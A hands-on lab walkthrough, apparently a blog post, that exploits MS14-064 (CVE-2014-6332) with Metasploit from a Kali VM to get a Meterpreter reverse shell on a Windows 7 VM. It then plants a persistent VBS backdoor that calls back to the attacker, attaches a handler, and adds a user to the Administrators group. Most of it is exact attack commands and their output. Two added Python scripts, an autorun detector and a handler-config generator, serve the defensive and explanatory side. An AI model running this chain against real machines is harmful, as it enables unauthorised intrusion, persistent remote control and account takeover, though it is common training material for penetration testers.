Implanting a Backdoor Program: a Hands-On Network Security Exercise

Create two virtual machines in VMware: a Windows 7 target and a Kali Linux attacker.

Kali: a Linux distribution built for penetration testing. It ships with several hundred security tools (the project itself advertises more than 600), so there is no need to hunt down installers from random websites, which is itself a supply-chain risk.

It is free to use, and most people learning penetration testing start with it.

Target machine: Win7 64-bit (IP: 192.168.10.45). Check with ipconfig.

Attacker: Kali (IP: 192.168.10.21). Check with ifconfig (or ip a on newer images where ifconfig is not installed).


1. Prerequisites for the experimental environment

In Win7, turn off the firewall ("Network and Sharing Center" - "Windows Firewall" - "Turn Windows Firewall on or off" - select the off option). This is a lab shortcut only: the default Windows 7 firewall drops inbound ICMP echo requests, so the ping test below would fail even though the exploit itself only needs outbound connections from Win7 to Kali.

Make sure the two virtual machines can reach each other; in particular, ping Win7 from Kali:

$ ping 192.168.10.45

2. Open the Metasploit penetration tool

Metasploit is an open-source penetration-testing framework; msfconsole starts its interactive console:

$ msfconsole

**Result:** the console starts and the prompt changes to "msf6 >".

3. View the vulnerabilities that need to be exploited

Search for the vulnerability, Microsoft bulletin MS14-064.

MS14-064 covers a Windows OLE Automation Array remote code execution vulnerability (CVE-2014-6332). OLE (Object Linking and Embedding) is a technology that lets applications share data and functionality. The bug is in how the OLE automation code handles arrays; a remote attacker can host a crafted web page and execute arbitrary code with the privileges of the user who views it in Internet Explorer.

[ Supplement: Microsoft's bulletin numbering for Windows vulnerabilities has the format MS14-064:

MS is the fixed abbreviation for Microsoft; 14 is the year, i.e. a bulletin released in 2014; 064 is the sequence number, i.e. the 64th bulletin of that year. One bulletin can cover several CVEs.]

msf6 > search ms14-064

**Result:** several matching modules are listed, each with an index number.

4. Try to use one of the vulnerable modules to attack

Use the browser exploit module (index 0 in the search results) and enter it (note: the path uses "_", not "-", otherwise an error is reported; after a search, use 0 selects the same module by its index).

msf6 > use exploit/windows/browser/ms14_064_ole_code_execution

**Result:** the prompt changes to "msf6 exploit(windows/browser/ms14_064_ole_code_execution) >",

and the console prints "No payload configured, defaulting to windows/meterpreter/reverse_tcp": no payload was set, so the module's default is used.

5. View the parameters required by the vulnerable module

After entering the module, check its options first. As with any tool, the module has to be told who to attack and where to listen before it can do anything, so start by listing what can be configured.

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options

**Result:** in the Required column, yes means the option must be set; no means it is optional.

The six options that matter here:

Payload (the code delivered to the target; keep the default windows/meterpreter/reverse_tcp);

SRVHOST (the address the module's web server binds to; the Kali address);

SRVPORT (the port of that web server; the default is fine);

LHOST (the address the payload connects back to; the Kali address);

LPORT (the port the payload connects back to; the default is fine);

AllowPowershellPrompt (lets the exploit launch PowerShell on the target, which may show a visible prompt; default false).

[ Supplementary explanation:

1) The payload is the code that runs on the remote system after the exploit succeeds. The exploit module gets code execution on the target; the payload defines what that execution is used for (here, a Meterpreter session).

2) There are three kinds of payload module: Single, Stager and Stage.

A Single is a self-contained payload: it does one simple job and needs nothing downloaded later, but it is correspondingly larger and easier to spot.

A Stager is a small payload that sets up a network connection between the target and the attacker and then pulls down the rest. The common stager reverse_tcp has the target open a TCP connection back to the attacker (a reverse shell over TCP, which is reliable through NAT and egress-only firewalls).

A Stage is the component the stager downloads. It provides the real functionality and is not constrained by the size limits of the exploit.

3) windows/x64/meterpreter/reverse_tcp consists of a stager (reverse_tcp) and a stage (meterpreter).

Note: the default payload windows/meterpreter/reverse_tcp gives a 32-bit Meterpreter, even on a 64-bit target.

To get a 64-bit Meterpreter instead, set the payload to windows/x64/meterpreter/reverse_tcp (only on a 64-bit target).]

6. Set the web server address (SRVHOST)

SRVHOST is empty and must be set; the others (Payload/SRVPORT/LHOST/LPORT) already have usable values. SRVHOST is the address the module's web server listens on. Who should it be set to, and why?

Analysis: the module starts a small HTTP server that serves the exploit page. When the generated URL is opened, the victim's browser connects to that server, which delivers the payload, and the payload then connects back to the attacker. The server has to run on the attacker's side, because we do not know in advance who will click the link, and the victim's browser must be able to reach it over the network.

Therefore the web server address is the Kali address (0.0.0.0 would bind every interface, but giving the real address makes the printed URL directly usable):

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVHOST 192.168.10.21

7. Allow the PowerShell prompt

Change AllowPowershellPrompt from false to true. On Windows 7 this module delivers the payload through PowerShell (the Windows XP path uses VBScript instead), so the exploit only works on targets with PowerShell installed, and the option name warns that a PowerShell window or prompt may briefly be visible to the user. It is not a browser plug-in.

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set AllowPowershellPrompt true

8. Check again

Check that the changes to SRVHOST and AllowPowershellPrompt took effect:

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options

9. After the check is correct, launch an attack

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > run

**Result:** the module starts its web server and prints the link to hand to the victim, "Using URL: http://192.168.10.21:8080/xE6RxjSy". The console then waits (the server keeps running as a background job) for someone to open that link.

10. Open the website link

In Win7, open the link http://192.168.10.21:8080/xE6RxjSy in Internet Explorer. IE asks whether to allow a file to be opened; after "Allow" is chosen, the payload runs and the session is triggered.

**Result 1:** in Win7 nothing visible happens after the page loads, apart from that prompt.

**Result 2:** because the link was opened in Win7, Kali reports that 192.168.10.45 (the Win7 target) requested the page, that the MS14-064 exploit was sent to it, and finally "Meterpreter session 1 opened (192.168.10.21:4444 -> 192.168.10.45:49191)": the payload connected back from Win7's ephemeral port 49191 to the handler on Kali's port 4444.

Usually the console drops straight into the Meterpreter prompt, the interactive control channel, which means the attack succeeded.

Notice:

If a session opens but the console does not enter Meterpreter automatically, press Enter to get the prompt back and attach to the session manually.

1) Manually view the currently existing sessions

At the msf6 > prompt (not inside Meterpreter), list the sessions that currently exist:

msf6 > sessions

**Result:** only session 1 exists; its type is meterpreter x86/windows, i.e. 32-bit (decided by the payload chosen in the module), and the user, host name and connection endpoints of the target 192.168.10.45 are shown.

2) Attach to the open session 1

msf6 > sessions -i 1

**Result:** the Meterpreter prompt appears; the attack succeeded and the session is interactive.

11. Implanting a backdoor program

Once Kali controls Win7, install a persistent backdoor on the target so that later access no longer depends on MS14-064 but goes through the backdoor instead [note: this is run at the Meterpreter prompt].

Note: MS14-064 is easy to patch away; once the target is updated, the browser-exploit path stops working, while an implanted backdoor survives. Do not overrate its stealth, though: the persistence script drops a plain-text VBS file in the user's %TEMP% directory and registers it in Run keys or as a service, which is exactly what autoruns tools and most anti-virus products look at, and recent Metasploit releases mark Meterpreter scripts as deprecated in favour of post/windows/manage/persistence_exe.

Install the backdoor with the persistence script (it supports several start-up methods), giving it the callback address and port:

meterpreter > run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21

The six flags that matter:

-S: install the agent as a Windows service so it starts at boot with SYSTEM privileges (needs administrator rights in the current session);

-U: start the agent when the user logs on (a Run key under HKCU; works without administrator rights);

-X: start the agent when the system boots (a Run key under HKLM; needs administrator rights);

-i: the interval in seconds between connect-back attempts after the agent starts;

-r: the host the agent connects back to, i.e. the address of the attacking Kali machine;

-p: the port on that host. Any value from 1 to 65535 works in principle; avoid ports below 1024 (privileged on Kali) and well-known service ports that something else may already be listening on;

**Result 1:** Kali reports that a backdoor script yqLAOjt.vbs was generated, that it will connect back to 192.168.10.21:40000 once started, and that it was written to C:\Users\18044\AppData\Local\Temp\ on the Win7 target.

[**Note:** the payload is automatically set to "windows/meterpreter/reverse_tcp", LHOST to 192.168.10.21 and LPORT to 40000.]

**Result 2:** in the directory C:\Users\18044\AppData\Local\Temp\ on Win7, the backdoor yqLAOjt.vbs planted from Kali is indeed present.

[Supplementary knowledge points:

1) Port number range: 0~65535

2) List of common port numbers
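The backdoor planted in step 11 is only "hard to find" for someone who never looks at autorun locations. The script below is an added example for the defender's side, not code from the original post or from Metasploit: it parses the text that reg query prints for a Run key and flags entries that autorun a script file, run out of a temp directory, or launch a script host such as wscript.exe. The sample reg query output is constructed; the value name gHkQwZPb and the Updater entry are made up (the persistence script uses a random alphabetic value name whose data is the path of the dropped .vbs), and the OneDrive and VMware entries are there as benign controls.

```python
"""Flag autorun entries that look like the persistence script's backdoor.

Added example, not code from the original post or from Metasploit.  It parses
the text that `reg query` prints for a Run key and applies three heuristics:
a script file (.vbs, .js, ...) is the autorun target, the target lives in a
temp directory, or the target is a script host such as wscript.exe.
"""
import re
import sys
from pathlib import PureWindowsPath

# Script extensions, matched only when nothing word-like follows (so .json
# does not match .js).
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta|bat|cmd|ps1)(?![\w.])", re.I)
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}

# Constructed sample of `reg query` output for the HKCU and HKLM Run keys.
# The gHkQwZPb and Updater entries are made up; the others are benign controls.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\18044\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    gHkQwZPb    REG_SZ    C:\Users\18044\AppData\Local\Temp\yqLAOjt.vbs
    Updater    REG_SZ    wscript.exe //B "C:\Users\18044\AppData\Roaming\upd.vbs"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
"""


def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) tuples from `reg query` output.

    Key paths are printed flush left; values are indented and separated by
    runs of spaces, so splitting on two or more spaces keeps names and data
    that contain single spaces intact.
    """
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()
            continue
        parts = re.split(r" {2,}", line.strip(), maxsplit=2)
        if key and len(parts) == 3:
            yield (key, parts[0], parts[1], parts[2])


def program_of(data):
    """Return what the value launches: the quoted path, or the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def reasons_for(data):
    """Heuristic flags for one Run value's data; an empty list means benign-looking."""
    reasons = []
    if SCRIPT_EXT_RE.search(data):
        reasons.append("autoruns a script file")
    if any(marker in data.lower() for marker in TEMP_MARKERS):
        reasons.append("runs from a temp directory")
    if PureWindowsPath(program_of(data)).name.lower() in SCRIPT_HOSTS:
        reasons.append("target is a script host")
    return reasons


def scan(text):
    """Return [(key, value_name, data, reasons)] for every suspicious entry."""
    hits = []
    for key, name, _vtype, data in parse_reg_query(text):
        reasons = reasons_for(data)
        if reasons:
            hits.append((key, name, data, reasons))
    return hits


if __name__ == "__main__":
    # On the Win7 box:
    #   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run > run.txt
    #   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >> run.txt
    # then: python3 find_autoruns.py < run.txt   (no input: scans the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_REG_QUERY
    for key, name, data, reasons in scan(text):
        print(f"[!] {key}\\{name}: {data}\n    {'; '.join(reasons)}")
```

The Run keys are only part of the picture: the -S flag registers a service instead, so a complete check also lists services whose binary path points into a user-writable directory, and the dropped .vbs plus the executable it writes remain in %TEMP% whatever start-up method was used.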

12. Suspend the current session

After implanting the backdoor, verify that it actually gives access to Win7. First leave the session obtained through MS14-064: either background it (background) or close it (exit); both work for this test.

meterpreter > background

**Result:** session 1 is backgrounded without being disconnected and the console returns to the msf6 > prompt.

13. Start the listener (handler) module

To receive the backdoor's connection we need a listener. exploit/multi/handler is the generic handler for reverse-connecting payloads; enter the module:

msf6 > use exploit/multi/handler

**Result:** the prompt changes to "msf6 exploit(multi/handler) >"

and the console prints "Using configured payload generic/shell_reverse_tcp", i.e. the current payload is generic/shell_reverse_tcp, which is not what the backdoor will send.

14. View the parameters required by the handler module

After entering the handler module, list its options so we can see what the listener needs to know.

msf6 exploit(multi/handler) > show options

**Result:** in the Required column, yes means the option must be set; no means it is optional.

The three options that matter:

Payload: the payload type the handler expects;

LHOST: the address to listen on;

LPORT: the port to listen on;

15. Set the payload, callback address and port

The handler we are starting exists solely to catch the callback from yqLAOjt.vbs, so its settings must match the parameters the backdoor was generated with:

"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"

So the handler's Payload must match the backdoor's payload (the stager type and architecture have to agree, otherwise the session will not stage correctly):

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

The handler's LHOST must match the backdoor's -r:

msf6 exploit(multi/handler) > set LHOST 192.168.10.21

The handler's LPORT must match the backdoor's -p:

msf6 exploit(multi/handler) > set LPORT 40000

16. Check again

msf6 exploit(multi/handler) > show options

17. After the check is correct, launch an attack

msf6 exploit(multi/handler) > run

**Result:** the handler starts listening on 192.168.10.21:40000. Because yqLAOjt.vbs was registered to start automatically and retries every 5 seconds, the handler receives a connection almost immediately after it starts.

Finally, "Meterpreter session 2 opened (192.168.10.21:40000 -> 192.168.10.45:49227)" shows session 2, from Win7's ephemeral port 49227 to the handler on port 40000.

Usually the console drops straight into the Meterpreter prompt, which means the backdoor works.

[ Note:

Now background this session too (background) and list the sessions (sessions): two open sessions are shown. Keep them apart: session 1 was opened through the MS14-064 exploit and session 2 through the backdoor. ]
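Steps 11 and 15 together say one thing: the handler's PAYLOAD, LHOST and LPORT must equal the backdoor's payload, -r and -p, or session 2 never appears. The script below is an added example, not code from the original post or from Metasploit: it parses a run persistence command line and emits the matching exploit/multi/handler resource script, with the operational caveats a practitioner should read first. The defaults it applies for omitted flags (port 4444, interval 5, payload windows/meterpreter/reverse_tcp) are assumed from the script's help text; the walkthrough always passes -p and -r explicitly. (The persistence script's own -A flag starts a matching handler for you; this example makes the rule explicit so it can also be applied to a handler started later, as in step 13.)

```python
"""Turn a Meterpreter `run persistence ...` command line into the matching
exploit/multi/handler resource script.

Added example, not code from the original post or from Metasploit; it encodes
the rule from the walkthrough that the handler's PAYLOAD, LHOST and LPORT must
equal the backdoor's payload, -r and -p.
"""
import ipaddress
import shlex

# Defaults applied when a flag is omitted.  Assumed from the persistence
# script's help text; the walkthrough passes -p and -r explicitly.
DEFAULT_PAYLOAD = "windows/meterpreter/reverse_tcp"
DEFAULT_PORT = 4444
DEFAULT_INTERVAL = 5

STARTUP_FLAGS = {"-S": "service", "-U": "logon", "-X": "boot"}
NEEDS_ADMIN = {"service", "boot"}  # -S creates a service, -X writes HKLM


def parse_persistence(cmdline):
    """Return the callback settings encoded in a `run persistence` line."""
    argv = shlex.split(cmdline)
    if argv[:2] != ["run", "persistence"]:
        raise ValueError("expected a 'run persistence ...' command line")
    opts = {"lhost": None, "lport": DEFAULT_PORT, "interval": DEFAULT_INTERVAL,
            "payload": DEFAULT_PAYLOAD, "startup": set()}
    i = 2
    while i < len(argv):
        flag = argv[i]
        if flag in STARTUP_FLAGS:          # boolean flags take no value
            opts["startup"].add(STARTUP_FLAGS[flag])
            i += 1
            continue
        if i + 1 >= len(argv):
            raise ValueError(f"flag {flag} needs a value")
        value = argv[i + 1]
        if flag == "-r":
            opts["lhost"] = str(ipaddress.ip_address(value))  # rejects junk
        elif flag == "-p":
            opts["lport"] = int(value)
        elif flag == "-i":
            opts["interval"] = int(value)
        elif flag == "-P":
            opts["payload"] = value
        else:
            raise ValueError(f"unsupported flag {flag}")
        i += 2
    if opts["lhost"] is None:
        raise ValueError("-r is required: the handler must know where the agent calls back")
    if not 1 <= opts["lport"] <= 65535:
        raise ValueError(f"port {opts['lport']} is outside 1-65535")
    return opts


def handler_rc(opts):
    """msfconsole resource script (.rc) for a handler that matches `opts`."""
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {opts['payload']}",  # same stager as the agent
        f"set LHOST {opts['lhost']}",      # the agent's -r
        f"set LPORT {opts['lport']}",      # the agent's -p
        "set ExitOnSession false",         # keep listening after the first session
        "exploit -j",                      # run the handler as a background job
    ]
    return "\n".join(lines) + "\n"


def warnings_for(opts):
    """Caveats worth reading before the handler and agent are used."""
    notes = []
    if opts["startup"] & NEEDS_ADMIN:
        notes.append("-S/-X need an administrator session on the target; "
                     "only -U works from a plain user session")
    if opts["lport"] < 1024:
        notes.append("LPORT below 1024 needs root on the Kali side")
    if opts["interval"] < 5:
        notes.append("an interval under 5 s produces a very noisy beacon")
    return notes


if __name__ == "__main__":
    # The exact command used in the walkthrough above.
    opts = parse_persistence("run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21")
    print(handler_rc(opts))
    for note in warnings_for(opts):
        print("[!]", note)
    # Save handler_rc(opts) as handler.rc and start it with: msfconsole -qr handler.rc
```

ExitOnSession false and exploit -j keep the handler alive after the first session, which matters for a beaconing agent: if the handler exits with session 2, the next callback five seconds later has nothing to connect to.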

18. Create user and set password

1) Get a command shell on the target; the prompt shows the working directory, C:\Windows\system32:

meterpreter > shell

2) The Windows console uses the local code page, so non-ASCII output may be garbled; switch to UTF-8:

C:\Windows\system32> chcp 65001

3) List all users of the Win7 system:

C:\Windows\system32> net user

4) Create a user

Create a user named test with the password test [net user <username> <password> /add]:

C:\Windows\system32> net user test test /add

A user can also be created without a password, here test1 [net user <username> /add]:

C:\Windows\system32> net user test1 /add

**Result 1:** if Kali shows "The command completed successfully", the user was created.

If it shows "System error 5 has occurred. Access is denied.", the session lacks the required privileges: creating local users needs administrator rights, and the session inherited the privileges of the user who opened the link in IE. Elevate first, for example with getsystem, one of the bypassuac local exploit modules, or a Windows kernel privilege-escalation exploit, and then retry.

**Result 2:** in Win7, "Control Panel" - "Add or remove user accounts" shows the new users test (standard user, password protected) and test1 (standard user, no password).

5) Add the new user to the Administrators group, i.e. make it an administrator [net localgroup administrators <username> /add]:

C:\Windows\system32> net localgroup administrators test1 /add

**Result 1:** Kali shows "The command completed successfully": the user was added to the Administrators group.

**Result 2:** in Win7, "Control Panel" - "Add or remove user accounts" shows that test1 changed from "Standard user" to "Administrator".


Origin blog.csdn.net/jazzz98/article/details/131189950